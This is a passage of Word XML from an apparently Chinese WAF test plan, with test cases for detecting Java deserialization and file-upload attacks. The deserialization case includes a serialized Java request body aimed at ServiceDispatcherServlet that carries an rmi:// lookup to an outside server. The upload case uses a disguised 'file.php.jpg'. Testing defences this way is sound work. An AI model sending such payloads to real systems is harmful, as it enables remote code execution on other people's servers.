              <w:t>反序列化攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3E87EA39">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="39095846">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="368C46E1">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果J</w:t>
            </w:r>
            <w:r>
              <w:t>ava</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用对用户输入，即不可信数据做了反序列化处理，那么攻击者可以通过构造恶意输入，让反序列化产生非预期的对象，非预期对象在产生的过程中就有可能带来任意代码的执行，J</w:t>
            </w:r>
            <w:r>
              <w:t>ava</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>反序列化漏洞也是近些年出现比较严重的漏洞。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="283F8C33">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7F31674B">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2554993D">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">1.    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39878FB4">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2.    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20A0BE5D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3.    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在客户端构造请求，如用浏览器访问如下链接：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51B3C4AF">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:left="360" w:firstLine="420"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK "http://www.site.com/ServiceDispatcherServlet/default" </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="36"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>http://www.site.com/ServiceDispatcherServlet/default</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="36"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="788D51AD">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:left="360" w:firstLine="48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请求的body内容为：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60834D76">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:left="360" w:firstLine="48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x00\\x00\\x01\\x84rq\\x89\\x00\\xac\\xed\\x00\\x05w\\x04\\x00\\x00\\x00\\x00sr\\x00%nc.bs.framework.common.InvocationInfo\\xd8#\\x9f\\xf47\\xeaT@\\x0c\\x00\\x00xpw\\x8b\\xff(nc.bs.framework.server.RemoteMetaContext\\x06lookup\\x06design\\x07simpchn\\x05#UAP#\\xff\\xff\\xff\\n10.2.5.104\\xff\\x00\\xff\\x121591424560679-9783\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\t/__client\\xff\\tGMT+08:00\\xffur\\x00\\x12[Ljava.lang.Class;\\xab\\x16\\xd7\\xae\\xcb\\xcdZ\\x99\\x02\\x00\\x00xp\\x00\\x00\\x00\\x01vr\\x00\\x10java.lang.String\\xa0\\xf0\\xa48z;\\xb3B\\x02\\x00\\x00xpur\\x00\\x13[Ljava.lang.Object;\\x90\\xceX\\x9f\\x10s)l\\x02\\x00\\x00xp\\x00\\x00\\x00\\x01t\\x00?rmi://192.168.20.30:12346/i/hcSvqI7U/5a736c/781x/ddfp/PQ5P8iBh/x</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6EAB0885">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="28F23C52">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7000EDAD">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77" name="Picture 385164377"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="java_event_72be8577472341f0b4933e607da07f83_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId25"/>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78" name="Picture 385164378"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="java_event_72be8577472341f0b4933e607da07f83_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId26"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2C730B28">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3272CE21">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="795A8C8B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21CEB86B">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1285A762">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="547FCBFB">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C13CD7">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc21077794"/>
      <w:bookmarkStart w:id="39" w:name="_Toc81916097"/>
      <w:bookmarkStart w:id="40" w:name="_Toc943663306"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件上传攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>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203A7C2C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2147EA16">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="5EEC09A2">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件上传攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="11147CF7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7EBA622C">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="4F55290B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件上传是W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用系统很常见的一种功能，本身是一项正常的业务需求，但如果在上传时没有对文件进行正确过滤，则可能会发生安全问题，例如一段</w:t>
            </w:r>
            <w:r>
              <w:t>PHP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>脚本伪装成图片文件，经解释器处理后变为可执行的脚本，W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>能够对上传的文件内容进行有效的过滤。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="240672E2">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5A0ACDC5">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6B84E7B0">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">1.    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64B94512">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2.    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="329BA03A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3.    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>新建</w:t>
            </w:r>
            <w:r>
              <w:t>“ file.php.jpg ”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件，文件内容可任意修改，通过站点的上传文件入口处上传该文件；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="175E9F00">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4.    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>观察W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="571BD240">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2671FE34">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7E31C9E8">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有效识别文件上传攻击，拦截攻击流量并记录攻击日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2235B2BF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="615DBC96">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6418B070">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5CD0CDE9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="01171F1C">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F1120DA">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F26476D">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A8F0C1E">
            <w:pPr>
              <w:pStyle w:val="89"/>
